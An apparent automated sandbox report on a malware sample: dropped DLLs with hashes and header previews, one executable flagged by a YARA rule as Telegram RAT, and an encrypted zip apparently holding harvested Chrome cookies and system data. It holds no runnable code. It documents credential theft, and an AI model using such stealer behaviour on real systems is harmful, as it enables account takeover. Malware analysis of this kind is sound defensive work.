                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......: ..~A..~A..~A..w9|.zA..,4..|A..,4..uA..,4..vA..,4..}A...4..}A..3..|A..~A..$A...4...A...4...A...4...A...4...A..Rich~A..........................PE..d......a.........." .....X...F.......T....................................................`.............................................T...4...x....................................{..T............................|..8............p...............................text....W.......X.................. ..`.rdata..T%...p...&...\..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):702792
                                                                                                                                                              Entropy (8bit):6.244166783535399
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:PAtiEf9cvD6YkZ3oqQt7FH03ZtoDbrTgG6VAfwIc:PAtij7V23oDF8Z8bry+wn
                                                                                                                                                              MD5:8E577CD10DF39DC52B7CF16BE83D1EB0
                                                                                                                                                              SHA1:98A85358ECCB159BD83464024ED950911D9F2FB8
                                                                                                                                                              SHA-256:C7828AA221C8DEBA81E1E1E128E4760E38D70213B5338856CA218A340F0C3300
                                                                                                                                                              SHA-512:4238BA647B19E1F7CA60895B01AB8638B3E6580B487E818249B78DB8B6C967AE0DB90ABD70CDD7EA3CA7C113E82C4BB3EE799374175C745B3054CB667BF89903
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................k........Rich...........................PE..d......>.........." ................................................................ j....`A.........................................*.. ... =..x................E......H!..............p............................................................................text.............................. ..`.rdata..............................@..@.data....8...p.......V..............@....pdata...E.......F...j..............@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:XENIX 8086 relocatable or 80286 small model
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):15313
                                                                                                                                                              Entropy (8bit):4.977510870796654
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:BRozbXGPRv2sK5EHWoX+pnWWATwdqMqE/:urOK50WpE/McMF
                                                                                                                                                              MD5:6D521BED2BFED7A06DD81BF2125A027A
                                                                                                                                                              SHA1:47DD3B214DFF823298D3C9A4FFE32EF59824F496
                                                                                                                                                              SHA-256:97C8ED74D091FCFD23498029BB819C29D096C3DCB1326EDEE5DFB0591ADE2E4B
                                                                                                                                                              SHA-512:B04114607DA0CB021E2350216B88B829C0CE8832C972DA8E97F0D530F591D900D023D2945D95D0C3D70F29E4161F26D496DA315B5BA49BF75855F78A22C7B7CD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:....;......}.(..symbol2number.}.(..file_input.M....and_expr.M....and_test.M....annassign.M....arglist.M....argument.M....arith_expr.M....assert_stmt.M....async_funcdef.M....async_stmt.M....atom.M....augassign.M....break_stmt.M....classdef.M....comp_for.M....comp_if.M....comp_iter.M....comp_op.M....comparison.M....compound_stmt.M....continue_stmt.M....decorated.M....decorator.M....decorators.M....del_stmt.M....dictsetmaker.M....dotted_as_name.M....dotted_as_names.M....dotted_name.M....encoding_decl.M....eval_input.M....except_clause.M....exec_stmt.M ...expr.M!...expr_stmt.M"...exprlist.M#...factor.M$...flow_stmt.M%...for_stmt.M&...funcdef.M'...global_stmt.M(...if_stmt.M)...import_as_name.M*...import_as_names.M+...import_from.M,...import_name.M-...import_stmt.M....lambdef.M/...listmaker.M0...namedexpr_test.M1...not_test.M2...old_lambdef.M3...old_test.M4...or_test.M5...parameters.M6...pass_stmt.M7...power.M8...print_stmt.M9...raise_stmt.M:...return_stmt.M;...shift_expr.M<...simple_stmt.M=
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:XENIX 8086 relocatable or 80286 small model
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1225
                                                                                                                                                              Entropy (8bit):4.796392161357142
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:epkGon0rE3OH1eGzUOUFvAvVi0iy6iu474o0X2MbwCMoG:e0roeG4tFvo4o0X/3G
                                                                                                                                                              MD5:F6DF5E3F1663A4E238BAADA95F5A0612
                                                                                                                                                              SHA1:D073D3739780A9780B9C669B90CACFC61D9B3FDD
                                                                                                                                                              SHA-256:36EE934395B9209737B13893DDAFF05FAD8E239C2FDFAC29D401D3FCEEB30768
                                                                                                                                                              SHA-512:535923C9A4BF2BF11A7B93BDFC1A4A8DBE75D4F62D6F680802AEC8FD50A701B0DA13E8642F8931A0CF71276553D88741331A61C268FB83FC377CA53F8FBF8F39
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:...........}.(..symbol2number.}.(..Matcher.M....Alternative.M....Alternatives.M....Details.M....NegatedUnit.M....Repeater.M....Unit.M..u..number2symbol.}.(M..h.M..h.M..h.M..h.M..h.M..h.M..h.u..states.].(].(].K.K...a].K.K...a].K.K...ae].(].(K.K...K.K...e].(K.K...K.K...K.K...ee].(].K.K...a].(K.K...K.K...ee].(].K.K...a].K.K...a].K.K...a].K.K...ae].(].K.K...a].(K.K...K.K...K.K...e].K.K...a].(K.K...K.K...e].K.K...a].K.K...ae].(].(K.K...K.K...K.K...e].K.K...a].K.K...a].(K.K...K.K...e].K.K...a].K.K...ae].(].(K.K...K.K...K.K...K.K...e].K.K...a].K.K...a].(K.K...K.K...K.K...K.K...e].(K.K...K.K...e].K.K...a].K.K...a].(K.K...K.K...K.K...K.K...e].K.K...a].(K.K...K.K...K.K...eee..dfas.}.(M..h.}.(K.K.K.K.K.K.K.K.K.K.u..M..h.}.(K.K.K.K.K.K.K.K.K.K.u..M..h.}.(K.K.K.K.K.K.K.K.K.K.u..M..h#}.K.K.s..M..h,}.K.K.s..M..h<}.(K.K.K.K.K.K.u..M..hL}.(K.K.K.K.K.K.K.K.u..u..labels.].(K...EMPTY...M..N..K.N..K.N..K.N..K...not...K.N..K.N..M..N..M..N..M..N..K.N..K.N..K.N..M..N..K.N..K.N..K.N..K.N..K.N..K.N..K.N..K.N..M
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3438840
                                                                                                                                                              Entropy (8bit):6.094542623790425
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:DTKuk2HvIU6iwpOjPWBdwQN+5X2uyWsrV4+OGyu1BYGx6KCIrA9NPe0Cs5Z1CPwE:Pg+Hb5Wt+2BoBIcU0CsD1CPwDv3uFfJZ
                                                                                                                                                              MD5:63C756D74C729D6D24DA2B8EF596A391
                                                                                                                                                              SHA1:7610BB1CBF7A7FDB2246BE55D8601AF5F1E28A00
                                                                                                                                                              SHA-256:17D0F4C13C213D261427EE186545B13EF0C67A99FE7AD12CD4D7C9EC83034AC8
                                                                                                                                                              SHA-512:D9CF045BB1B6379DD44F49405CB34ACF8570AED88B684D0AB83AF571D43A0D8DF46D43460D3229098BD767DD6E0EF1D8D48BC90B9040A43B5469CEF7177416A2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................0.........................3........^....^.....^....^.\...^....Rich............................PE..d....A.a.........." ......$...................................................5.......4...`..........................................h/..h...:4.@....p4.|....`2.h....\4.......4..O..,.,.8...........................p.,.8............04..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata..8....`2.......1.............@..@.idata..^#...04..$....3.............@..@.00cfg..c....`4.......3.............@..@.rsrc...|....p4.......3.............@..@.reloc...x....4..z....3.............@..B................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):32792
                                                                                                                                                              Entropy (8bit):6.3566777719925565
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
                                                                                                                                                              MD5:EEF7981412BE8EA459064D3090F4B3AA
                                                                                                                                                              SHA1:C60DA4830CE27AFC234B3C3014C583F7F0A5A925
                                                                                                                                                              SHA-256:F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
                                                                                                                                                              SHA-512:DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):698104
                                                                                                                                                              Entropy (8bit):5.531132600342763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:tgH+zxL52Y1Ag5EbSJyin89m8GXfbmednWAeO6GKaf525eWP8U2lvzI:DD1Ag5h/L5mO6GVf52se8U2lvzI
                                                                                                                                                              MD5:86556DA811797C5E168135360ACAC6F2
                                                                                                                                                              SHA1:42D868FC25C490DB60030EF77FBA768374E7FE03
                                                                                                                                                              SHA-256:A594FC6FA4851B3095279F6DC668272EE975E7E03B850DA4945F49578ABE48CB
                                                                                                                                                              SHA-512:4BA4D6BFFF563A3F9C139393DA05321DB160F5AE8340E17B82F46BCAF30CBCC828B2FC4A4F86080E4826F0048355118EF21A533DEF5E4C9D2496B98951344690
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!9._@W^_@W^_@W^V8.^S@W^.7V_]@W^.2V_]@W^.7R_T@W^.7S_W@W^.7T_[@W^.7V_\@W^_@V^.AW^.7S_s@W^.7W_^@W^.7.^^@W^.7U_^@W^Rich_@W^........PE..d....A.a.........." .....<...T......<...............................................)&....`.........................................00...N..HE..........s.......|M..............t...t...8...............................8............0..H............................text....:.......<.................. ..`.rdata..:....P...0...@..............@..@.data...AM.......D...p..............@....pdata..dV.......X..................@..@.idata..PW...0...X..................@..@.00cfg..c............d..............@..@.rsrc...s............f..............@..@.reloc..]............n..............@..B................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):204176
                                                                                                                                                              Entropy (8bit):6.34063073300471
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:VvpRBxj9K0R7RkouZGl2wIyuy6fHr5CNIz:jVjwIl2Zxhz
                                                                                                                                                              MD5:34EA1B1C7D3A9EFFDA3A485D21ABADE3
                                                                                                                                                              SHA1:6FB594C0C73E02B5F89B019F188C4CA69BA5DCB1
                                                                                                                                                              SHA-256:215614C89AED025166D3434252BD914EA2AC5AF0762D2DD01ED4F4966D9ED711
                                                                                                                                                              SHA-512:8874BE2826E0D3A94E9FB400438BF9B0197FF47EFF4E7AF3A643934C6E56905B658ACF23FBF088BE0926700723BCE62125C418CA927D41C2935BDFF8B3CA912C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.J.A.J.A.J.9:J.A.J.4.K.A.J.4.K.A.J.4.K.A.J.4.K.A.J%4.K.A.JL3.K.A.J.A.J.A.J%4.K.A.J%4.K.A.J%4VJ.A.J%4.K.A.JRich.A.J........................PE..d.....a.........." .........................................................0......oC....`............................................P... ................................ .......V..T............................V..8............@...............................text....-.......................... ..`.rdata......@.......2..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4522384
                                                                                                                                                              Entropy (8bit):6.4378039941067735
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:4ENLhuwbNGaMesS0sE08504kQQVO1DRhsJsZfaQiOhUrCBm72adVqPFU4bNbD85f:44fGves108PkpOX205dxQUHoMHnwD
                                                                                                                                                              MD5:5871AE2A45D675ED9DD077C400018C30
                                                                                                                                                              SHA1:DDC03AF9D433C3DFAD8A193C50695139C59B4B58
                                                                                                                                                              SHA-256:5D0FF879174FAEC03EB173EB2088F2E7519F4663DD6BFE5B817EC602C389AE20
                                                                                                                                                              SHA-512:D87A90DBF42C528BC3FA038EB83D4318D2E8577A590BF9C84641C573B5B2FEA83AAC91BB108968252E07497424ED85F519A864E955F94A7F8E87BFC38E0F4B7B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x...x...x.......x.......x.......x.......x.......x....h..x..#....x...x...y..J...8x..J....x..J....x..J....x..Rich.x..........................PE..d......a.........." ......#...#...............................................G.....O.E...`.........................................P:=.....@.>.|.... G.......D.(9....D......0G..u...H%.T...........................@I%.8.............#.h............................text...<.#.......#................. ..`.rdata..NT....#..V....#.............@..@.data........0>.......>.............@....pdata..(9....D..:...(B.............@..@.rsrc........ G......bD.............@..@.reloc...u...0G..v...lD.............@..B................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):29584
                                                                                                                                                              Entropy (8bit):6.2508420003744725
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:iT2YyAU1265who1HqWORWJIz7GmYiSyv//hd42:X86GhoKWORWJIz7Gm7SyA2
                                                                                                                                                              MD5:0906200F02E2EE5EB3DA08A64F10A69E
                                                                                                                                                              SHA1:5AFCB2CC53A6D8CA85D1FE51389632B8B84D5194
                                                                                                                                                              SHA-256:FB4FA3AED7A7955D4F78A3FBC2A6E6E1AB8D9E3768BB8B3F3A85866D1F2D74D5
                                                                                                                                                              SHA-512:B69E9F7FDD77F776ACD056CC8A2D8B34DA76E1F30A50117B9AA6BF467A9CE7178407FC6B5E2126C0EEA6F995FFA8AE94F92E0632C566FC39BAB29FF278193CBC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... ...N...N...N......N...O...N...K...N...J...N...M...N.t.O...N...O...N...O...N.t.C...N.t.N...N.t.....N.t.L...N.Rich..N.................PE..d.....a.........." ....."...4.......................................................;....`..........................................Q..L....R..x............p..T....T..........D....B..T...........................0C..8............@..(............................text.... .......".................. ..`.rdata..J....@.......&..............@..@.data........`.......B..............@....pdata..T....p.......D..............@..@.rsrc................H..............@..@.reloc..D............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1539472
                                                                                                                                                              Entropy (8bit):6.56866658234246
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:1vKXB9kVI7EekT9T/m8roZ+QxW+DpzpGq86pMjPip8lwHozQhI+B2+IisME0Ed+j:1i32I7E9T9T/m8roZnptGq5p82/I+08J
                                                                                                                                                              MD5:7FBC8739145E278B84CB4A8387B72A5C
                                                                                                                                                              SHA1:DBC90D1A1374E6CAE77C34200D28E2345A332D13
                                                                                                                                                              SHA-256:C3EC90118AA788D786F53E6EBCD4C549EBF0D6F80C426674435E36388E2D317A
                                                                                                                                                              SHA-512:999AC6E2CA2729EE11B21D036E747D7CC1E717035F439E95BF6AA84B6022FE053480C2C88A545A42B805A2CC2019C9919415B29E5F66A25661A60AB1293F98BB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.l...?...?...?..k?...?_..>...?_..>...?_..>...?_..>...?...>...?...?|..?...>...?...>...?...?...?...>...?Rich...?................PE..d.....a.........." .....b...........a....................................................`.............................................. ...=.......................^..............p...T..............................8............................................text....`.......b.................. ..`.rdata..D............f..............@..@.data....6...P...,...2..............@....pdata...............^..............@..@.rsrc................H..............@..@.reloc...............R..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1866480
                                                                                                                                                              Entropy (8bit):6.5127394823224245
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:aNJSAyrJZwdI3xpXxBX4Crw9yilqy+uVUD5Wbsr+Qt682zhPlkPkGqTvI92jHBH9:aNgjid2LD5W4ac6xdLvIkhHP4ATdeD0
                                                                                                                                                              MD5:75909678C6A79CA2CA780A1CEB00232E
                                                                                                                                                              SHA1:39DDBEB1C288335ABE910A5011D7034345425F7D
                                                                                                                                                              SHA-256:FBFD065F861EC0A90DD513BC209C56BBC23C54D2839964A0EC2DF95848AF7860
                                                                                                                                                              SHA-512:91689413826D3B2E13FC7F579A71B676547BC4C06D2BB100B4168DEF12AB09B65359D1612B31A15D21CB55147BBAB4934E6711351A0440C1533FB94FE53313BF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"Tw^C:$^C:$^C:$.6;%\C:$8,.$]C:$.6?%RC:$.6>%VC:$.69%ZC:$W;.$LC:$.+<%_C:$.+;%SC:$^C;$GB:$.62%.C:$.6:%_C:$.6.$_C:$.68%_C:$Rich^C:$........PE..d...@..a.........." .....................................................................`.........................................@....`...+..T.......8............^..............P...............................p...8............................................text...H........................... ..`.rdata..............................@..@.data....#...P.......<..............@....pdata...............D..............@..@.rsrc...8............<..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):9737728
                                                                                                                                                              Entropy (8bit):5.889520608360159
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:98304:rRipp0rNB8XL8xDz6HFh6DG+0EV9II93tDDGA+c99tciWhdzCcDqHB26LDA:8gG1EV9II9MqM6A
                                                                                                                                                              MD5:BA25C8AF9DD114244EC83C9F6B0D12EB
                                                                                                                                                              SHA1:49429C4B5448014664CBD3404174EC87A662D324
                                                                                                                                                              SHA-256:0CE54664ECF691C84263A6FD18741365104CDEEA3F21E5086CBE55F6BEDCC41B
                                                                                                                                                              SHA-512:E64D9065E0EA05F32080499C67C75D4DF01C286906FFF42C3BB720E4EC2B305C32585F61884B5FDF147BD43E948EC0D4B63134B3946715E88B1B73A2E8B278AF
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe, Author: Joe Security
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....M.d........../....#......................@......................................w...........................................................4........u......X..........................................@...(.......................(............................text...............................`.P`.data...`.... ......................@.`..rdata..P...........................@.`@.eh_fram............................@.0..pdata...X.......Z..................@.0@.xdata...o...P...p..................@.0@.bss..................................`..idata...4.......6..................@.@..CRT....h...........................@.@..tls................................@.@..rsrc.....u.......u.................@..@........................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1541872
                                                                                                                                                              Entropy (8bit):6.176467305040153
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:C1Bvnu8AyQD9FLi543GLUKuPO6EinYTVAiueFoC+vMvE58KOJ0wd98ydeyRP/ecr:CIyQD9FU43GLUKuPO6EinYTVAFSvESKI
                                                                                                                                                              MD5:4B6270A72579B38C1CC83F240FB08360
                                                                                                                                                              SHA1:1A161A014F57FE8AA2FADAAB7BC4F9FAAAC368DE
                                                                                                                                                              SHA-256:CD2F60075064DFC2E65C88B239A970CB4BD07CB3EEC7CC26FB1BF978D4356B08
                                                                                                                                                              SHA-512:0C81434D8C205892BBA8A4C93FF8FC011FB8CFB72CFEC172CF69093651B86FD9837050BD0636315840290B28AF83E557F2205A03E5C344239356874FCE0C72B9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h3.,,R..,R..,R..~'.~.R..~'.~'R..~'.~$R..~'.~(R..w:.~/R...'.~-R..%*'.<R..w:.~9R..,R..eS...'.~.R...'.~-R...'K.-R...'.~-R..Rich,R..........................PE..d...m..a.........." .........~......|.....................................................`.............................................L@...[..|........{... .......j.......`...A...-...............................-..8...............8............................text...X........................... ..`.rdata...l.......n..................@..@.data................j..............@....pdata....... ......................@..@.rsrc....{.......|..................@..@.reloc...A...`...B...(..............@..B........................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1122192
                                                                                                                                                              Entropy (8bit):5.375103168153638
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:TezMmuZ63N9QCb5Pfhnzr0ql8L8kkM7IRG5eeme6VZyrIBHdQLhfFE+uoo43:TezuuZV0m88MMREtV6Vo4uYoos
                                                                                                                                                              MD5:814D6938DA8E46D79B64326AA967A1A0
                                                                                                                                                              SHA1:6D020C9CA51D7D4E77C197F5394D7E157482CEA3
                                                                                                                                                              SHA-256:4059ACB95B05B4536C983EBD232DC5AEC00828914E61F31674B0FDF41656DEB6
                                                                                                                                                              SHA-512:F286B6E813BCD3EE9AAD25F804689E3E8BBE13A41BB5715E49BCC1DC7CCAE2F0C7595DBAABAD806FEA65825952E5E31D32AC9B31E583BF4B7CDF716AE6FA08D1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.$~6OJ-6OJ-6OJ-?7.-0OJ-d:K,4OJ-d:O,:OJ-d:N,>OJ-d:I,5OJ-.:K,5OJ-.=K,4OJ-6OK-|OJ-.:G,7OJ-.:J,7OJ-.:.-7OJ-.:H,7OJ-Rich6OJ-................PE..d.....a.........." .....J..........T).......................................@.......]....`.............................................X...h........ .......................0......`L..T............................L..8............`...............................text....I.......J.................. ..`.rdata.."....`.......N..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):97168
                                                                                                                                                              Entropy (8bit):6.424686954579329
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:yKHLG4SsAzAvadZw+1Hcx8uIYNUzU6Ha4aecbK/zJZ0/b:yKrfZ+jPYNz6Ha4aecbK/FZK
                                                                                                                                                              MD5:A87575E7CF8967E481241F13940EE4F7
                                                                                                                                                              SHA1:879098B8A353A39E16C79E6479195D43CE98629E
                                                                                                                                                              SHA-256:DED5ADAA94341E6C62AEA03845762591666381DCA30EB7C17261DD154121B83E
                                                                                                                                                              SHA-512:E112F267AE4C9A592D0DD2A19B50187EB13E25F23DED74C2E6CCDE458BCDAEE99F4E3E0A00BAF0E3362167AE7B7FE4F96ECBCD265CC584C1C3A4D1AC316E92F0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...Y.-a.........." .........`......p.....................................................`A.........................................B..4....J...............p..X....X...#..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):655770
                                                                                                                                                              Entropy (8bit):7.997269575710416
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:12288:JveO8gGRqq2zIUdda6n120e4xUC6kLJMj9n6Ddy0hqN+POWz35SyzjHG:Jve1Rq6UddD1ulkLJBzhqNaOWz35/zLG
                                                                                                                                                              MD5:F6C91DDB31B2871E985AD7F3F850552E
                                                                                                                                                              SHA1:1B5FC8DE860353D978B1705779C29715691A714E
                                                                                                                                                              SHA-256:6B68064A0B68E35686302443821A291914AF9EAE7ED9EE0035BFEE7010D7F230
                                                                                                                                                              SHA-512:8452BA8EB287950E21C2D8FDB09E22B0DDA23DB779DED7AFBDEBAE5D3F5CD7A351704FE8994C7EDDC85D5A9006AF1BC02D7E22E3B97E6011727E40D535445494
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:PK.........m!W................Browsers/PK.........m!W................Programs/PK.........m!W................System/PK.........m!W................Browsers/Chrome/PK.........m!W............#...Browsers/Chrome/Default Cookies.txt..M..H.........`.PT.....A.E.k.!|*............LR...:.sRO.vU.;f..:1.jM..N,.2.(H@."B..*CR(..............V..I.J`......GEq..1h+.'.o..2..Q.g...Lg.......W.j...X.|N.].....FwK%(.....j...t..Z4$..!.P{...1....(A.Q.R,a4....d.!A.x.N..Hp......{...?lSR.g..*.i.....T$u.Ty..8..1...t.g). !.b(?O.C...Db..b.a.......&<.. }...a..Sr......` ...bA.R(.y.....S$.Xx.K..../.........."..H.......S...-..If...G....J..,..x,.<..9.O....P.B...P. ;..g.Tpr.@..@.....;..9.7..H.....I.,.8]Q.,}. ...R...T2...:|zG?6.......QGQ......I.g[=............|.x....l.>..N6_[7..,...K.Sc88..D...Yq.....\.Zo..J;r.....),..Go..v...Q......9.1.-(.p...<..x~.D..Dim^.v._...R.L......p..p?.D..%gi.W..g.yYrz.........C....mS...!...........c...u*....8T.}...GY..,.?..1.z..j.C...b][....A.x...Oa.
